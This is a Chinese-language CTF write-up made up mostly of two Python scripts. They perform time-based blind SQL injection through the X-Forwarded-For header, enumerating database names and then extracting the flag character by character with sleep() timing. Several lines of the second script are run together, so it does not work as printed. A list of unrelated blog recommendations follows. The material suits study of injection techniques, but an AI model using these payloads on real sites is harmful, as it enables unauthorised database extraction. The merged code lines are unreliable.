不多说,直接使用脚本跑

 # -*- coding:utf-8 -*-

 import requests

 import string

 url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess = string.lowercase+string.uppercase+string.digits+string.punctuation

 database=[]

 for database_number in range(0,100): #假设爆破前100个库

 databasename=''

 for i in range(1,100): #爆破字符串长度,假设不超过100长度

 flag=0

 for str in guess: #爆破该位置的字符

 #print 'trying ',str

 headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=4)

 except:

 databasename+=str

 flag=1

 print '正在爆破第%d个数据库名,the databasename now is '%(database_number+1) ,databasename

 break

 if flag==0:

 break

 database.append(databasename)

 if i==1 and flag==0:

 print '扫描完成'

 break

 for i in range(len(database)):

 print database[i]

获取数据库名称

然后再获取数据表,列,flag

 #-*-coding:utf-8-*-import requestsimport string

 url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess=string.lowercase + string.uppercase + string.digits

 flag=""

 for i in range(1,100):

 havetry=0

 for str in guess:

 headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=6)

 except requests.exceptions.ReadTimeout, e:

 havetry=1

 flag = flag + str

 print "flag:", flag

 break

 if havetry==0:

 breakprint 'result:' + flag

获取flag

(flag有点长,要跑一会儿)

随机推荐

  1. 【转】python Counter模块

    >>> c = Counter() # 创建一个新的空counter >>> c = Counter('abcasdf') # 一个迭代对象生成的counter & ...

  2. SynchronizationContext笔记

    SynchronizationContext 类是一个基类,可提供不带同步的自由线程上下文. 此类实现的同步模型的目的是使公共语言运行库内部的异步/同步操作能够针对不同的异步模型采取正确的行为.此模型 ...

  3. 使用Advanced Installer 13.1打包发布 Windows Service服务程序

    原文: 使用Advanced Installer 13.1打包发布 Windows Service服务程序 项目中需要用到一个定时推送案件状态的需求,本人小菜一只,在同事建议下要写成一个windows ...

  4. jQuery实时聊天jquery-chat

    jquery-chat是基于jQuery UI + Node.js + Socket.IO 实现100%纯JavaScript实时聊天(客户端和服务器都是JS),实现了facebook / Gmail ...

  5. VC6下 try catch 在release下的杯具(默认情况下,要加上throw语句catch才不会被优化掉)

    IDE:VC6 今天遇到一个小问题,把我郁闷了好久,××医生的VulEngine不时在wcsstr处发生crash,加了一番强大的参数检查后,再加上了强大的try catch,其实不是很喜欢用try和 ...

  6. tortoisegit密码找回之抓包法

    因为一直用tortoisegit记住密码(此方法只适用于tortoisegit有记住密码),昨天需要登陆gitlab发现密码忘记了,用了N个常用默认密码都不对:和度娘交流一会儿也无果,gitlab里的 ...

  7. vuex分模块2

    深入理解Vuex 模块化(module) 转载  2017-09-26   作者:ClassName    我要评论 本篇文章主要介绍了Vuex 模块化(module),小编觉得挺不错的,现在分享给大 ...

  8. python小方法 随笔记

    1. 元组和列表的接收 s1,s2 = [,] print(s1,s2) # 执行结果: 1 2 s3,s4 = (,) print(s3,s4)# 执行结果: 3 4 2. 变量值的交换 a = b ...

  9. Netty源码分析-- 处理客户端接入请求(八)

    这一节我们来一起看下,一个客户端接入进来是什么情况.首先我们根据之前的分析,先启动服务端,然后打一个断点. 这个断点打在哪里呢?就是NioEventLoop上的select方法上. 然后我们启动一个客 ...

  10. hiccup和Latch off

    hiccup(Constant-Current)和Latch off 限电流保护的两种形式 hiccup:一种是以恒定电流存在,这种一般是可恢复的,当故障解除后自动恢复: Latch off:一种是锁 ...